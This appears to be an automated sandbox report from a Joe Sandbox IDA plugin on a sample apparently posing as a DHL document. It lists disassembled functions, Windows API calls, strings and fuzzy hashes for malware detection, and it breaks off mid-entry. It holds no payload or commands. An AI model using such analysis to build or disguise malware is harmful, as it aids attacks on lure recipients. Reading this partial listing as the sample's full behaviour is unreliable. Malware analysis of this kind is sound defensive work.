Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 53f51f5c647c4a1ab081e3aa64f3998eb5cf9d67e4624089086b76bb4c417f70
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 6601E932100149BBDF125E95CC46FEB7B7DEF68754F048018FE5896121C732E961EBA0

Function 001D3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,001A13C6,00000000,00000000,?,001D301A,001A13C6,00000000,00000000,00000000,?,001D328B,00000006,FlsSetValue), ref: 001D30A5
GetLastError.KERNEL32(?,001D301A,001A13C6,00000000,00000000,00000000,?,001D328B,00000006,FlsSetValue,00242290,FlsSetValue,00000000,00000364,?,001D2E46), ref: 001D30B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,001D301A,001A13C6,00000000,00000000,00000000,?,001D328B,00000006,FlsSetValue,00242290,FlsSetValue,00000000), ref: 001D30BF

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 06250be129061a07569bd8e629003f76a54bd4d234d0bdb4b9a80fcbc586dad9
Instruction ID: 8211aeb3be4b16f641c1052034947436bab78968f6521bc88b39e6779a449194
Opcode Fuzzy Hash: 06250be129061a07569bd8e629003f76a54bd4d234d0bdb4b9a80fcbc586dad9
Instruction Fuzzy Hash: F601DB36741322ABCB314B79BC8C9577B98AF45B61B250621FD26F7340D721D941C7E1

Function 00207464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0020747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00207497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002074AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 002074CA

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: cab25654a7accf98233c5fda481053d2f01d58be4418570a2bf36bb35e1ba9d2
Instruction ID: b66808df0d12f1390c20c2a242afda6458ffb18ea4dfaf920e27ed93bbaec051
Opcode Fuzzy Hash: cab25654a7accf98233c5fda481053d2f01d58be4418570a2bf36bb35e1ba9d2
Instruction Fuzzy Hash: A5116DB5A25315ABF7208F14EC09B937BFCEB00B04F208569A656E6192D7B0F914DB60

Function 0020B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0020ACD3,?,00008000), ref: 0020B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0020ACD3,?,00008000), ref: 0020B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0020ACD3,?,00008000), ref: 0020B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0020ACD3,?,00008000), ref: 0020B126

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: a7b8d0006c810e25affcc26e2db2cc909ff0d42894b47bc84c210a5c3ea6fe2c
Instruction ID: f21fec7c78ff7dc5995c0c10d69ee9e6af385393014b4937e459f5f7641f5092
Opcode Fuzzy Hash: a7b8d0006c810e25affcc26e2db2cc909ff0d42894b47bc84c210a5c3ea6fe2c
Instruction Fuzzy Hash: AE116D31C2162DE7CF21AFE4E958AEEFB78FF09711F104095D985B2182CB7056609B91

Function 00202DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00202DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00202DD6
GetCurrentThreadId.KERNEL32 ref: 00202DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00202DE4

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: c22826b627b033787347ae3e30f9f7bfebb2ca0eeeb0e36837b79b7643f646eb
Instruction ID: 9ac2390e176f80dad295265fa1b0c63c865978cb9272bb41adc7d5df8774ccf7
Opcode Fuzzy Hash: c22826b627b033787347ae3e30f9f7bfebb2ca0eeeb0e36837b79b7643f646eb
Instruction Fuzzy Hash: 95E09271111324BBDB202F72AC0EFEB3E6CEF83BA1F100016F105E10819AA0C844CBB0

Function 00238863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 001B9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001B9693
Part of subcall function 001B9639: SelectObject.GDI32(?,00000000), ref: 001B96A2
Part of subcall function 001B9639: BeginPath.GDI32(?), ref: 001B96B9
Part of subcall function 001B9639: SelectObject.GDI32(?,00000000), ref: 001B96E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00238887
LineTo.GDI32(?,?,?), ref: 00238894
EndPath.GDI32(?), ref: 002388A4
StrokePath.GDI32(?), ref: 002388B2

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 08b78f28874c17f7bf368e277cbe902dc9ae83c9c7b7c7d54312e37f00518d31
Instruction ID: 418e12f07b903b1f7d0d938f9577591b741142db7aefe42415eb8d479126e8f6
Opcode Fuzzy Hash: 08b78f28874c17f7bf368e277cbe902dc9ae83c9c7b7c7d54312e37f00518d31
Instruction Fuzzy Hash: 44F03A36055699FADB125F98AC0DFCA3B69AF06710F148000FB12750E2C7755562DBA5

Function 001B98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 001B98CC
SetTextColor.GDI32(?,?), ref: 001B98D6
SetBkMode.GDI32(?,00000001), ref: 001B98E9
GetStockObject.GDI32(00000005), ref: 001B98F1

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: e5a94974029ad726918ef27b250e38f6dcf436c00b4312fcbf9df14fb15d1e83
Instruction ID: 0e8d50e406c5d4b13272c94900c171f46051e71a575f8c5052682ca0ac862ad4
Opcode Fuzzy Hash: e5a94974029ad726918ef27b250e38f6dcf436c00b4312fcbf9df14fb15d1e83
Instruction Fuzzy Hash: A9E06531244244AADF215B74BC0DBE83F10AB11335F148219F7F9640E1C37146419F10

Function 0020162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00201634
OpenThreadToken.ADVAPI32(00000000,?,?,?,002011D9), ref: 0020163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002011D9), ref: 00201648
OpenProcessToken.ADVAPI32(00000000,?,?,?,002011D9), ref: 0020164F

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 3b31d8b2ac6644b43f544bda15ad6556a306e0eb211a0e779f79683f342ad558
Instruction ID: f0b0f4540e2284a212ec361aec6a6df35762fef0fc4df28e36beabd1b8eb4b38
Opcode Fuzzy Hash: 3b31d8b2ac6644b43f544bda15ad6556a306e0eb211a0e779f79683f342ad558
Instruction Fuzzy Hash: 68E08C32602312EBD7202FA0BE0DB873B7CAF44792F248808F745E9080E7348454CB60

Function 001FD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 001FD858
GetDC.USER32(00000000), ref: 001FD862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 001FD882
ReleaseDC.USER32(?), ref: 001FD8A3

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: cb8fd5c56c2c142d277ca696be2eaf44290aa5ae206666f1f647b58683399098
Instruction ID: 156b5b5f25c00900ca3bd064470d244a6a5f3bcae617950a55d815b01e427bda
Opcode Fuzzy Hash: cb8fd5c56c2c142d277ca696be2eaf44290aa5ae206666f1f647b58683399098
Instruction Fuzzy Hash: 16E012B5800204EFCB45AFA0E80DA6DBBBAFB48310F218009F956F7260CB398901AF40

Function 001FD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 001FD86C
GetDC.USER32(00000000), ref: 001FD876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 001FD882
ReleaseDC.USER32(?), ref: 001FD8A3

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: f334cc184a7e9e7766dfad707e5ab2f34b8c21d6d1cb87edcd24a0568b5ef906
Instruction ID: 96e24f596903e389fad2fbb782586d3b99fc44082606cc36678e331ea1ba8483
Opcode Fuzzy Hash: f334cc184a7e9e7766dfad707e5ab2f34b8c21d6d1cb87edcd24a0568b5ef906
Instruction Fuzzy Hash: 17E012B5800200EFCB44AFA0E80D66DBBB9BB48310F208009F95AF7260CB389901AF40

Function 00214D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 001A7620: _wcslen.LIBCMT ref: 001A7625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00214ED4

Strings

*, xrefs: 00214E10
LPT, xrefs: 00214DFB

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 31bb8d11e9c20e6674ffce6cf81c7659db17e7657fbf49fbad883b5468001d97
Instruction ID: 5178a37a77c354cd9932f94864ec6520456e31ae5877dda66500bcf1dd627953
Opcode Fuzzy Hash: 31bb8d11e9c20e6674ffce6cf81c7659db17e7657fbf49fbad883b5468001d97
Instruction Fuzzy Hash: 08918375A102059FCB14EF58C484EE9BBF1BF59304F198099E40A9F7A2C771EE96CB90

Function 001CE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 001CE30D

Strings

pow, xrefs: 001CE2E5, 001CE302

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: aa66bd10f75608c2a2c7cc4d47e2c795c8b7ec4b96a194222a381f080903eccb
Instruction ID: 9c9a9b71136e7c10f9856e7d2d0bd99d2fc7f0e86ad445112a140b01507f1b19
Opcode Fuzzy Hash: aa66bd10f75608c2a2c7cc4d47e2c795c8b7ec4b96a194222a381f080903eccb
Instruction Fuzzy Hash: 98515B61A0C60296CB157718D905B7E3BE4AF60740F704D9EF0D6823E9FB34CC959A46

Function 00227771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(001F569E,00000000,?,0023CC08,?,00000000,00000000), ref: 002278DD

Part of subcall function 001A6B57: _wcslen.LIBCMT ref: 001A6B6A

CharUpperBuffW.USER32(001F569E,00000000,?,0023CC08,00000000,?,00000000,00000000), ref: 0022783B

Strings

<s&, xrefs: 002277C8

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: <s&
API String ID: 3544283678-70216238
Opcode ID: dbf5e780c62b121a4dd17b758882e2dd9ee35043008b184252aee857b1d081eb
Instruction ID: 3100df62cacdd060b23e71c85485ccb5c1972ec85e82235127ca22e741debe54
Opcode Fuzzy Hash: dbf5e780c62b121a4dd17b758882e2dd9ee35043008b184252aee857b1d081eb
Instruction Fuzzy Hash: 23616C3A928229ABCF04EFE4EC91DFDB378BF25300B444125F542A7091EF745A59DBA0

Function 001BE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 001BE1B1

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 7c4adbff086ed8e7abb0c6354a301f250788623e45ae7a301f9c86912f0ec506
Instruction ID: 1673effe38fa71506ebe88024a08d0b11f6e5ab8eff0f42f89af94672708b3cc
Opcode Fuzzy Hash: 7c4adbff086ed8e7abb0c6354a301f250788623e45ae7a301f9c86912f0ec506
Instruction Fuzzy Hash: 5951373950424ADFDB19EF68C481AFA7BE4EF65310F2441A5FD519B2E0D7349D42CB90

Function 001BF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 001BF2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 001BF2BB

Strings

@, xrefs: 001BF2AF

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 6c902aea5269dab2d88c5f0b4a981f0e37db0c1dcd16728d4b73e26c85044fe5
Instruction ID: c429563eeb7118e5e4856ab64c79053606283e308d1294a211e0ea5ba3f81d4e
Opcode Fuzzy Hash: 6c902aea5269dab2d88c5f0b4a981f0e37db0c1dcd16728d4b73e26c85044fe5
Instruction Fuzzy Hash: E75135714087449FD320AF14EC86BABBBF8FF96300F81885DF1D9411A5EB708529CB66

Function 00225745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 002257E0
_wcslen.LIBCMT ref: 002257EC

Strings

CALLARGARRAY, xrefs: 002257E6, 002257EB

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 48cbfbc2b7fcd4ae5b53d883a08c4e0f6503e6f90e2c3b7bf266aa3420d3c22d
Instruction ID: 1f8f0deaf5c8de54a3be5cf00f989ee39d3c64694e97d768848ef11794fc3bd6
Opcode Fuzzy Hash: 48cbfbc2b7fcd4ae5b53d883a08c4e0f6503e6f90e2c3b7bf266aa3420d3c22d
Instruction Fuzzy Hash: FD41B035E10229AFCB04DFA8D8858FEBBB5FF59320F108029E505AB291D7B49D91CB91

Function 0021D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0021D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0021D13A

Strings

|, xrefs: 0021D10B

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 1fdc9b224ae7cdd0dcfc38d0ec8bc9a4ce6ed6d4e4936f20f443f32605fac7f0
Instruction ID: bfa06acd0e91e9ed6a18baca2103c8ad95e7a1442d2b4990714258d31b78d7e5
Opcode Fuzzy Hash: 1fdc9b224ae7cdd0dcfc38d0ec8bc9a4ce6ed6d4e4936f20f443f32605fac7f0
Instruction Fuzzy Hash: 0A314C75D10219EBCF15EFA4CC85AEEBFB9FF29300F100019F819A6162D735AA56CB50

Function 0023356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00233621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0023365C

Strings

static, xrefs: 002335BC

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: ad4bdf50c697786419a8238a9dbc685bfe18aea20134b22755aa924dab29cbc5
Instruction ID: 12f395a417854d746ccfde389588b29ea991611a90c9d34b30a71ef38ef0c829
Opcode Fuzzy Hash: ad4bdf50c697786419a8238a9dbc685bfe18aea20134b22755aa924dab29cbc5
Instruction Fuzzy Hash: 9E318EB1120205AEDB10DF28DC41ABB73ADFF98724F109619F8A5D7290DB30ADA18B64

Function 00234537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0023461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00234634

Strings

', xrefs: 0023458E

Memory Dump Source

